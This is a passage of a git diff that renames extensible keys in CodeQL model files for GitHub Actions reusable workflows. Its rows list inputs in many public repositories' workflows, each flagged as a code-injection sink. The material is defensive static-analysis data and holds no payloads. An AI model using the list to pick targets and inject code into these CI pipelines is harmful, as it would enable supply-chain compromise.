["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "input.options", "code-injection", "generated"] - ["python/cpython/.github/workflows/reusable-tsan.yml", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml index baba2fc1e150..561c3e15e641 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml index feb68c4bdd74..961741f413f3 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pytorch/xla/.github/workflows/_test.yml", "*", "input.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml index d3b779c1afa2..985652a265b6 100644 --- a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "input.buckets", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml index 6b0e733be176..3103913ab4f9 100644 --- a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.tagged_release", "code-injection", "generated"] - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.target_branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml index cf9971e85246..b89c1307d2d4 100644 --- a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "input.gdal_ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml index b3518a7a8eed..9e60cc61bb56 100644 --- a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml index a60fba237ef1..cac4e298538b 100644 --- a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["remix-run/remix/.github/workflows/stacks.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml index 37f2febb70f3..eb2669a96ead 100644 --- a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "input.version_override", "code-injection", "generated"] - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "input.architecture", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml index 6e3d48dbf89c..590e518d3508 100644 --- a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "input.total-shard", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml index 465fff41145d..d55af595b1cb 100644 --- a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "input.prerel_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml index 3f091f1c9613..1fd6cd394bcc 100644 --- a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.target_version", "code-injection", "generated"] - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml index efa591f749dd..3583052045b8 100644 --- a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "input.daisyuiversion", "code-injection", "generated"] - ["saadeghi/daisyui/.github/workflows/deploy-docs.yml", "*", "input.daisyuiversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml index 4bd74701fde7..f355ceee6da2 100644 --- a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.stage", "code-injection", "generated"] - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.targets_optional", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml index 34d11e19946b..2b9190c87af8 100644 --- a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "input.constraints", "code-injection", "generated"] - ["schemastore/schemastore/src/negative_test/github-workflow/reusable-workflow-input-must-declare-type.yaml", "*", "input.constraints", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml index fb4a82488530..783ff3c04682 100644 --- a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "input.job_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml index ef3af44da3a8..de853d30588b 100644 --- a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.run", "code-injection", "generated"] - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.ruby-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml index a8c86c49d7c0..31f09278ecd3 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.latest", "code-injection", "generated"] - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml index 40549844d385..d45a2e2a03a0 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.ignore_test_status", "code-injection", "generated"] - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.test_filter", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml index bd180d9b3676..896400bf2f15 100644 --- a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "input.package_installation_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml index 1e5721f1e7c5..ade06c90c26b 100644 --- a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "input.arch", "code-injection", "generated"] - ["softfever/orcaslicer/.github/workflows/build_deps.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml index b7a14240aed5..f4c2d488ba37 100644 --- a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "input.option", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml index 1a276f8812f7..8a11ced42d02 100644 --- a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "input.commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml index ef448c8f4c0d..4c018b20f223 100644 --- a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.version", "code-injection", "generated"] - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml index 6c6721700258..315c85efeb62 100644 --- a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "input.verSion", "code-injection", "generated"] - ["speedb-io/speedb/.github/workflows/build_macos_ARM.yml", "*", "input.verSion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml index b7104a8b6153..8a3132d52582 100644 --- a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml index cd81a7239066..9a669c8c009a 100644 --- a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.marks", "code-injection", "generated"] - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.python-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml index 1b2ce37480f5..0ecb817822c0 100644 --- a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "input.pull_request_number", "code-injection", "generated"] - ["stdlib-js/stdlib/.github/workflows/lint_autofix.yml", "*", "input.pull_request_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml index 91889927c452..e4590eeec8b6 100644 --- a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.patch", "code-injection", "generated"] - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.minor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml index 8d4400bd3ead..ea0ddad06978 100644 --- a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "input.patch_path", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml", "*", "input.ref", "output.ref", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml index 29c7e1bd3e24..9352f766e82d 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["supabase/auth/.github/workflows/publish.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml index 109dce9df0db..d436644f4acd 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "input.image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml index e3643f0156b2..c6c01abca904 100644 --- a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "input.workflow_run", "code-injection", "generated"] - ["tencent/hippy/.github/workflows/reuse_classify_commits.yml", "*", "input.pull_request_number", "code-injection", "generated"] @@ -9,7 +9,7 @@ extensions: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "output.pull_request_head_sha", "taint", "manual"] - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "output.pull_request_number", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml index a4bba59b5a5c..8a9f76e7e52d 100644 --- a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.map", "code-injection", "generated"] - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.minor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml index d12982c35a45..8b3cfebc67b9 100644 --- a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "input.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml index deb10e5e4b4f..9add4859f35a 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "input.target", "code-injection", "generated"] - ["tiann/kernelsu/.github/workflows/avd-kernel.yml", "*", "input.manifest_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml index 5c22f0ffcb76..efc8097b963f 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "input.asan", "code-injection", "generated"] - ["tiledb-inc/tiledb/.github/workflows/append-release-cmake.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml index 790e94c2aacd..6a305522cfb4 100644 --- a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml index fedb21393bc3..441325c76a5f 100644 --- a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "input.crate", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml index f60fffb206e2..5f0831afc073 100644 --- a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "input.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml index c7fe932aba20..afd7aabc1fce 100644 --- a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.framework", "code-injection", "generated"] - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml index d47aea3363f3..49e556f585f6 100644 --- a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "input.pytest_markers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml index f32acf5038ef..24585aa50ed0 100644 --- a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.pace", "code-injection", "generated"] - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.next", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml index c739b5750ccb..afc7af28f9b4 100644 --- a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.server_id", "code-injection", "generated"] - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.secondary_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml index 7ac3c0fb530e..5b3d91a8a7ba 100644 --- a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - 